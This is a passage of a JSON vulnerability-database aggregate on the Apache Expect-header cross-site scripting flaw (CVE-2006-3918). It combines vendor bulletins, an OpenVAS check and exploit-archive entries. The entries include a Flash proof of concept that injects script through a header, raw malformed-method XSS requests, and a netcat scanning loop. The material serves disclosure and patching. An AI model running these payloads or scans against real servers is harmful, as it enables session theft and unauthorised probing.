4.3}}, "title": "httpd, mod_ssl security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3918"], "modified": "2006-08-24T16:50:36", "href": "http://lists.centos.org/pipermail/centos-announce/2006-August/013163.html", "id": "CESA-2006:0618", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "httpd": [{"lastseen": "2016-09-26T21:39:38", "references": [], "description": "\n\nA flaw in the handling of invalid Expect headers. If an attacker can\ninfluence the Expect header that a victim sends to a target site they\ncould perform a cross-site scripting attack. It is known that \nsome versions of Flash can set an arbitrary Expect header which can \ntrigger this flaw. Not marked as a security issue for 2.0 or\n2.2 as the cross-site scripting is only returned to the victim after\nthe server times out a connection.\n\n", "edition": 1, "reporter": "Apache Team Foundation", "published": "2006-05-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "httpd", "title": "Apache Httpd < 1.3.35: Expect header Cross-Site Scripting", "bulletinFamily": "software", "affectedSoftware": [{"name": "Apache httpd", "version": "1.3.22", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.4", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.26", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.12", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.32", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.20", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.28", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.17", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.29", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.33", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.24", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.34", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.9", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.19", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.31", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.27", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.6", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.14", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.11", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.3", "operator": "eq"}], "cvelist": ["CVE-2006-3918"], "modified": "2006-05-01T00:00:00", "id": "HTTPD:21276F7B71358FCD8ED42705121EF5F3", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T00:35:48", "references": [], "description": "\n\nA flaw in the handling of invalid Expect headers. If an attacker can\ninfluence the Expect header that a victim sends to a target site they\ncould perform a cross-site scripting attack. It is known that \nsome versions of Flash can set an arbitrary Expect header which can \ntrigger this flaw. Not marked as a security issue for 2.0 or\n2.2 as the cross-site scripting is only returned to the victim after\nthe server times out a connection.\n\n", "edition": 3, "reporter": "Apache Team Foundation", "published": "2006-05-08T00:00:00", "title": "Apache Httpd < None: Expect header Cross-Site Scripting", "type": "httpd", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Apache httpd", "version": "1.3.22", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.4", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.26", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.12", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.32", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.20", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.28", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.17", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.29", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.33", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.24", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.34", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.9", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.19", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.31", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.27", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.6", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.14", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.11", "operator": "eq"}, {"name": "Apache httpd", "version": "1.3.3", "operator": "eq"}], "cvelist": ["CVE-2006-3918"], "modified": "2006-05-08T00:00:00", "id": "HTTPD:7FD1B79F0D1704151C70AE49C5A4F4BD", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T08:08:34", "osvdbidlist": ["27488"], "references": [], "description": "Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness. CVE-2006-3918. Remote exploit for linux platform", "edition": 1, "reporter": "Thiago Zaninotti", "published": "2006-08-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3918"], "modified": "2006-08-24T00:00:00", "id": "EDB-ID:28424", "href": "https://www.exploit-db.com/exploits/28424/", "sourceData": "source: http://www.securityfocus.com/bid/19661/info\r\n\r\nApache HTTP server is prone to a security weakness related to HTTP request headers.\r\n\r\nAn attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.\r\n\r\nvar req:LoadVars=new LoadVars();\r\nreq.addRequestHeader(\"Expect\",\r\n\"<script>alert('gotcha!')</script>\");\r\nreq.send(\"http://www.target.site/\",\"_blank\",\"GET\");", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28424/"}], "packetstorm": [{"lastseen": "2016-12-05T22:13:38", "references": [], "edition": 1, "description": "", "reporter": "Adrian Pastor", "published": "2007-12-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "packetstorm", "title": "ProCheckUp Security Advisory 2007.37", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3918"], "modified": "2007-12-02T00:00:00", "href": "https://packetstormsecurity.com/files/61420/ProCheckUp-Security-Advisory-2007.37.html", "id": "PACKETSTORM:61420", "sourceData": "`PR07-37: XSS on Apache HTTP Server 413 error pages via malformed HTTP method \n \n \nVulnerability found: 7 November 2007 \n \nVendor contacted: 14 November 2007 \n \nRisk factor: N/A \n \nThe reason why we didn't consider this vulnerability a security risk is because the attacker needs to force the victim's browser to submit a malformed HTTP method. \n \nHeader injection has been demonstrated to be possible using Flash [1] [2], but might be dependent on vulnerable Flash plugins. \n \nA relevant example published in the past is exploiting the Apache 'Expect' XSS [3] (CVE-2006-3918) using flash [4]. \n \nHowever, in this case we need to spoof the HTTP METHOD to a specially-crafted value. \n \n \nDescription: \n \nIt is possible to cause Apache HTTP server to return client-supplied scripting code by submitting a malformed HTTP method which would actually carry the payload (i.e.: malicious JavaScript) and invalid length data in the form of either of the following: \n \nTwo 'Content-length:' headers equals to zero. i.e.: \"Content-Length: 0[LF]Content-Length: 0\" \nOne 'Content-length:' header equals to two values. i.e.: \"Content-length: 0, 0\" \nOne 'Content-length:' header equals to a negative value. i.e.: \"Content-length: -1\" \nOne 'Content-length:' header equals to a large value. i.e.: \"Content-length: 9999999999999999999999999999999999999999999999\" \n \n \nApache 2.X returns a '413 Request Entity Too Large' error, when submitting invalid length data. When probing for XSS on the error page returned by the server we have 3 possible string vectors: \n \nThe 'Host:' header \nThe URL \nThe HTTP method \n \nIf we probe for XSS using the 'Host:' header, Apache correctly filters the angle brackets and replaces them with HTML entities: \n \nREQUEST: \n \nGET / HTTP/1.1 \nHost: <BADCHARS> \nConnection: close \nContent-length: -1 \n[LF] \n[LF] \n \n \nSERVER'S REPONSE: \n \nHTTP/1.1 413 Request Entity Too Large \nDate: Fri, 30 Nov 2007 12:40:19 GMT \nServer: Apache/2.0.55 (Ubuntu) PHP/5.1.6 \nConnection: close \nContent-Type: text/html; charset=iso-8859-1 \n \n<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"> \n<html><head> \n<title>413 Request Entity Too Large</title> \n</head><body> \n<h1>Request Entity Too Large</h1> \nThe requested resource<br />/<br /> \ndoes not allow request data with GET requests, or the amount of data provided in \nthe request exceeds the capacity limit. \n<hr> \n<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at <badchars> Port 80</address> \n</body></html> \n \n \nNotice that '<BADCHARS>' gets replaced with '<badchars>' \n \nIf we probe for XSS using the URL, Apache ALSO correctly filters the angle brackets and replaces them with HTML entities: \n \nREQUEST: \n \nGET /<BADCHARS>/ HTTP/1.1 \nHost: target-domain.foo \nConnection: close \nContent-length: -1 \n[LF] \n[LF] \n \n \nSERVER'S RESPONSE: \n \nHTTP/1.1 413 Request Entity Too Large \nDate: Fri, 30 Nov 2007 12:41:17 GMT \nServer: Apache/2.0.55 (Ubuntu) PHP/5.1.6 \nConnection: close \nContent-Type: text/html; charset=iso-8859-1 \n \n<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"> \n<html><head> \n<title>413 Request Entity Too Large</title> \n</head><body> \n<h1>Request Entity Too Large</h1> \nThe requested resource<br />/<BADCHARS>/<br /> \ndoes not allow request data with GET requests, or the amount of data provided in \nthe request exceeds the capacity limit. \n<hr> \n<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo Port 80</address> \n</body></html> \n \n \nAgain, '<BADCHARS>' gets replaced with '<badchars>' \n \n \nHowever, if we probe for XSS using a malformed HTTP method, the angle brackets are NOT replaced with HTML entities: \n \n \nREQUEST: \n \n<BADCHARS> / HTTP/1.1 \nHost: target-domain.foo \nConnection: close \nContent-length: -1 \n[LF] \n[LF] \n \n \nSERVER'S RESPONSE: \n \nHTTP/1.1 413 Request Entity Too Large \nDate: Fri, 30 Nov 2007 12:42:46 GMT \nServer: Apache/2.0.55 (Ubuntu) PHP/5.1.6 \nConnection: close \nContent-Type: text/html; charset=iso-8859-1 \n \n<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"> \n<html><head> \n<title>413 Request Entity Too Large</title> \n</head><body> \n<h1>Request Entity Too Large</h1> \nThe requested resource<br />/<br /> \ndoes not allow request data with <BADCHARS> requests, or the amount of data provided in \nthe request exceeds the capacity limit. \n<hr> \n<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo Port 80</address> \n</body></html> \n \n \n \nThe following script could be used to audit your network for vulnerable web servers: \n \n#!/bin/bash \n# PR07-37-scan \nif [ $# -ne 1 ] \nthen \necho \"$0 <hosts-file>\" \nexit \nfi \n \nfor i in `cat $1` \ndo \n \nif echo -en \"<PROCHECKUP> / HTTP/1.1\\nHost: $i\\nConnection: close\\nContent-length: 0\\nContent-length: 0\\n\\n\" | nc -w 4 $i 80 | grep -i '<PROCHECKUP>' > /dev/null \nthen \necho \"$i is VULNERABLE!\" \nfi \n \ndone \n \n \nVulnerability successfully tested on (banners extracted from server headers): \n \nServer: Apache/2.0.46 (Red Hat) \nServer: Apache/2.0.51 (Fedora) \nServer: Apache/2.0.55 (Ubuntu) PHP/5.1.6 \nServer: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7g \nServer: Apache/2.2.3 (FreeBSD) mod_ssl/2.2.3 OpenSSL/0.9.7e-p1 DAV/2 \nServer: Apache/2.2.4 (Linux/SUSE) \n \n \nNote: other versions might also be vulnerable. \n \n \nConsequences: \n \nThis type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e. session IDs) to unauthorised third parties provided that a web browser is tricked to submit a malformed HTTP method. \n \n \nWorkaround: \n \nDisable Apache's default 413 error pages by adding 'ErrorDocument 413' statement to the Apache config file. \n \n \nReferences: \n \nhttp://www.procheckup.com/Vulnerability_2007.php \n \n[1] \"Forging HTTP request headers with Flash\" \nhttp://archives.neohapsis.com/archives/bugtraq/2006-07/0425.html \n \n[2] \"HTTP Header Injection Vulnerabilities in the Flash Player Plugin\" \nhttp://download2.rapid7.com/r7-0026/ \n \n[3] \"Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1\" \nhttp://www.securityfocus.com/archive/1/433280 \n \n[4] \"More Expect Exploitation In Flash\" \nhttp://ha.ckers.org/blog/20071103/more-expect-exploitation-in-flash/ \n \n \nCredits: Adrian Pastor and Amir Azam of ProCheckUp Ltd (www.procheckup.com). \n \nSpecial thanks go to Amit Klein and Joe Orton for providing such valuable feedback. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/61420/PR07-37.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:18:08", "references": [], "edition": 1, "description": "", "reporter": "Yasser ABOUKIR", "published": "2011-06-14T00:00:00", "type": "packetstorm", "title": "Oracle HTTP Server Header Cross Site Scripting", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3918", "CVE-2007-0275"], "modified": "2011-06-14T00:00:00", "href": "https://packetstormsecurity.com/files/102234/Oracle-HTTP-Server-Header-Cross-Site-Scripting.html", "id": "PACKETSTORM:102234", "sourceData": "`--------------------------------------------------------------------------------------------------------- \nOracle HTTP Server XSS Header Injection \n--------------------------------------------------------------------------------------------------------- \n# Attack Pattern ID : CAPEC-86 \n# CWE ID : CI-79 \n# OWASP IDs : A1-Injections, A2-Cross Site Scripting (XSS) \n# CVE ID : not yet \n# Related CVEs : CVE-2006-3918, CVE-2007-0275 \n# A.K.A : Unfiltered Header Injection \n# Product Type : Application \n# Vendor : Oracle Corporation \n# Product : Oracle HTTP Server for Oracle Application Server 10g \n# Vulnerable Versions: 10.1.2.0.2 \n# Probably Vulnerable: (not tested) 10.1.2.0.0, 9.0.4.3.0, 9.0.4.2.0, 9.0.4.1.0, 9.0.4.0.0 \n# Severity : Medium \n# Tested on : Linux, Windows Server 2003 \n# Download link : http://www.oracle.com/technetwork/middleware/ias/downloads/101201se-090616.html \n# Date : 12/06/2011 \n# Google Dork : allintitle:\"Oracle HTTP Server -\" \n------------------------------------------------------------------------------------------------------- \n[-] Credit : Yasser ABOUKIR \n[-] Site : http://www.yaboukir.com \n[-] Email : yaboukir@gmail.com<script type=\"text/javascript\"> \n/* <![CDATA[ */ \n(function(){try{var s,a,i,j,r,c,l=document.getElementById(\"__cf_email__\");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); \n/* ]]> */ \n</script> \n[-] Occupation: ITC security engineering student at ENSIAS - Morocco \n------------------------------------------------------------------------------------------------------- \n[+] Vulnerability description: \nThe Oracle HTTP Server does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file. \n \n[+] Vulnerability origin: \nOracle HTTP Server (OHS) developed by Oracle Corporation is an OracleAS 10g's Web Server component. The vulnerable product is based on the Apache 1.3 Web server. This later is vulnerable to Unfiltered Header Injection which makes the vulnerability\u0092s origin of this OHS version. \n \n[+] PoC: \nSee the video in Youtube: http://www.youtube.com/watch?v=cBmbkAYXdjo \nSee the PDF: http://www.yaboukir.com/wp-content/bugtraq/XSS_Header_Injection_in_OHS_by_Yasser.pdf \n \n[+] Attack: \n> Atack Prerequisites for a successful exploitation: \nTarget software must be a client that allows scripting communication from remote hosts. Crafting the attack to exploit this issue is not a complex process. However most of the unsophisticated attackers will not know that such an attack is possible. Also an attacker needs to reach his victims by enticing them to visit remote site of some sort to redirect them and data to. \n> Attacker Skills or Knowledge Required \n- Skill or Knowledge Level: Low \nTo achieve a redirection and use of less trusted source, an attacker can simply edit HTTP Headers that are sent to client machine. \n- Skill or Knowledge Level: High \nExploiting a client side vulnerability to inject malicious scripts into the browser's executable process. \n> Methods of Attack \n- Injection \n- Modification of Resources \n- Protocol Manipulation \n> Exploit: \n- Steal session IDs, credentials, page content, etc.: \nAs the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on. \n- Forceful browsing: \nWhen the attacker targets this Oracle application (through CSRF vulnerabilities, Clickjacking), the user will then be the one who perform the attacks without being aware of it. \n- Content spoofing: \nBy manipulating the content, the attacker targets the information that the user would like to get from the Website. \n \n[+] Solution: \nA solution to this issue might be the update/upgrade to the Oracle HTTP Server 11g which is based on Apache 2.2. In fact, Oracle supports only the code they ship with the Oracle Application Server 10g. Externally added modules or other changes are not supported. As a matter of fact, security patches from the Apache organization in its latest versions 1.3.35/2.0.58/2.2.2 to this vulnerability onto Oracle HTTP Server should not be applied. \n \n[+] References: \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918 \nOracle Application Server 10g Release 3 (10.1.3.1.0) Overview of Oracle HTTP Server, An Oracle White Paper, October 2006 \nhttp://seclists.org/Webappsec/2006/q2/245 \nhttp://www.securiteam.com/securityreviews/5KP0M1FJ5E.html \nhttp://www.securityfocus.com/archive/1/441014 \nhttp://kb2.adobe.com/cps/403/kb403030.html \nhttp://www.oracle.com/technetwork/middleware/ias/index-091236.html \nhttp://www.oracle.com/technetwork/middleware/ias/faq-089946.html \nhttp://download.oracle.com/otndocs/tech/ias/portal/files/RG/complete_Web_site_ohs_faq.htm#OHS \nhttp://xss.cx/http-header-injection-expect-response-splitting-cI-113-example-poc.aspx \nhttp://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-707/opxss-1/Oracle-Application-Server.html \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102234/oraclehttp-xss.txt"}], "oraclelinux": [{"lastseen": "2018-08-31T01:38:30", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.52-28.1", "arch": "i386", "packageFilename": "httpd-2.0.52-28.1.i386.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.52-28.1", "arch": "x86_64", "packageFilename": "httpd-manual-2.0.52-28.1.x86_64.rpm", "packageName": "httpd-manual", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.52-28.1", "arch": "x86_64", "packageFilename": "httpd-devel-2.0.52-28.1.x86_64.rpm", "packageName": "httpd-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.52-28.1", "arch": "x86_64", "packageFilename": "mod_ssl-2.0.52-28.1.x86_64.rpm", "packageName": "mod_ssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.52-28.1", "arch": "src", "packageFilename": "httpd-2.0.52-28.1.src.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.52-28.1", "arch": "src", "packageFilename": "httpd-2.0.52-28.1.src.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.0.1", "arch": "i386", "packageFilename": "mod_ssl-2.0.46-61.ent.0.1.i386.rpm", "packageName": "mod_ssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.52-28.1", "arch": "x86_64", "packageFilename": "httpd-2.0.52-28.1.x86_64.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.0.1", "arch": "x86_64", "packageFilename": "httpd-2.0.46-61.ent.0.1.x86_64.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.52-28.1", "arch": "x86_64", "packageFilename": "httpd-suexec-2.0.52-28.1.x86_64.rpm", "packageName": "httpd-suexec", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.0.1", "arch": "i386", "packageFilename": "httpd-devel-2.0.46-61.ent.0.1.i386.rpm", "packageName": "httpd-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.0.1", "arch": "x86_64", "packageFilename": "httpd-devel-2.0.46-61.ent.0.1.x86_64.rpm", "packageName": "httpd-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.52-28.1", "arch": "i386", "packageFilename": "httpd-devel-2.0.52-28.1.i386.rpm", "packageName": "httpd-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.0.1", "arch": "x86_64", "packageFilename": "mod_ssl-2.0.46-61.ent.0.1.x86_64.rpm", "packageName": "mod_ssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.0.1", "arch": "i386", "packageFilename": "httpd-2.0.46-61.ent.0.1.i386.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.52-28.1", "arch": "i386", "packageFilename": "httpd-manual-2.0.52-28.1.i386.rpm", "packageName": "httpd-manual", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.52-28.1", "arch": "i386", "packageFilename": "mod_ssl-2.0.52-28.1.i386.rpm", "packageName": "mod_ssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.0.52-28.1", "arch": "i386", "packageFilename": "httpd-suexec-2.0.52-28.1.i386.rpm", "packageName": "httpd-suexec", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.0.1", "arch": "src", "packageFilename": "httpd-2.0.46-61.ent.0.1.src.rpm", "packageName": "httpd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "2.0.46-61.ent.0.1", "arch": "src", "packageFilename": "httpd-2.0.46-61.ent.0.1.src.rpm", "packageName": "httpd", "operator": "lt"}], "description": " [2.0.52-28.1]\n - changed index.html to oracle_index.html\n \n [2.0.52-28.ent]\n - add security fix for Expect header XSS (CVE-2006-3918, #200732) ", "edition": 3, "reporter": "Oracle", "published": "2006-11-30T00:00:00", "title": "Moderate httpd security update ", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-3918"], "modified": "2006-11-30T00:00:00", "id": "ELSA-2006-0619", "href": "http://linux.oracle.com/errata/ELSA-2006-0619.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:00", "references": [], "pluginID": "57335", "description": "The remote host is missing an update to apache\nannounced via advisory DSA 1167-1.\n\nSeveral remote vulnerabilities have been discovered in the Apache, the\nworlds most popular webserver, which may lead to the execution of arbitrary\nweb script. The Common Vulnerabilities and Exposures project identifies\nthe following problems:\n\nCVE-2005-3352\n\nA cross-site scripting (XSS) flaw exists in the mod_imap component of\nthe Apache server.\n\nCVE-2006-3918\n\nApache does not sanitize the Expect header from an HTTP request when\nit is reflected back in an error message, which might allow cross-site\nscripting (XSS) style attacks.", "edition": 2, "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "Debian Security Advisory DSA 1167-1 (apache)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918", "CVE-2005-3352"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57335", "id": "OPENVAS:57335", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1167_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1167-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 1.3.33-6sarge3.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 1.3.34-3.\n\nWe recommend that you upgrade your apache package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201167-1\";\ntag_summary = \"The remote host is missing an update to apache\nannounced via advisory DSA 1167-1.\n\nSeveral remote vulnerabilities have been discovered in the Apache, the\nworlds most popular webserver, which may lead to the execution of arbitrary\nweb script. The Common Vulnerabilities and Exposures project identifies\nthe following problems:\n\nCVE-2005-3352\n\nA cross-site scripting (XSS) flaw exists in the mod_imap component of\nthe Apache server.\n\nCVE-2006-3918\n\nApache does not sanitize the Expect header from an HTTP request when\nit is reflected back in an error message, which might allow cross-site\nscripting (XSS) style attacks.\";\n\n\nif(description)\n{\n script_id(57335);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-3918\", \"CVE-2005-3352\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Debian Security Advisory DSA 1167-1 (apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache-dev\", ver:\"1.3.33-6sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-doc\", ver:\"1.3.33-6sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-utils\", ver:\"1.3.33-6sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache\", ver:\"1.3.33-6sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-common\", ver:\"1.3.33-6sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-dbg\", ver:\"1.3.33-6sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-perl\", ver:\"1.3.33-6sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache-ssl\", ver:\"1.3.33-6sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache-mod-perl\", ver:\"1.29.0.3-6sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-26T08:55:54", "references": [], "pluginID": "65575", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2-prefork\n apache2\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5013454 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-10-10T00:00:00", "title": "SLES9: Security update for apache2,apache2-prefork,apache2-worker", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 